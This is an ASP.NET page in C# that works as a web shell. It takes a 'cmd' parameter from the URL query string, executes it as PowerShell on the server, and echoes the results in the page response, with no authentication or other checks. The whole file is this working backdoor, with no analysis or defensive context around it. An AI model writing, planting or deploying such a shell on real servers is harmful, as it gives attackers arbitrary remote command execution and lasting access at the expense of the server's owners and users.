<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Management.Automation"%>
<%@ Import Namespace="System.Management.Automation.Runspaces"%>
<%@ Import Namespace="System.Collections.ObjectModel"%>
<%@ Assembly Name="System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31BF3856AD364E35"%>

<script runat="server">
     
    protected void Page_Load(object sender, EventArgs e)
    {
		string cmd = Request.QueryString["cmd"];  
        Runspace rs = RunspaceFactory.CreateRunspace();
        rs.Open();

        PowerShell ps = PowerShell.Create();
        ps.Runspace = rs;

        ps.AddScript(cmd);
        Collection<PSObject> res = ps.Invoke();
        rs.Close();
		
	

	    StringBuilder stringBuilder = new StringBuilder();
        foreach (PSObject obj in res)
        {
            Response.Write(obj.ToString()+"\n");
			Response.Write(Environment.NewLine);
        }
    }
</script>

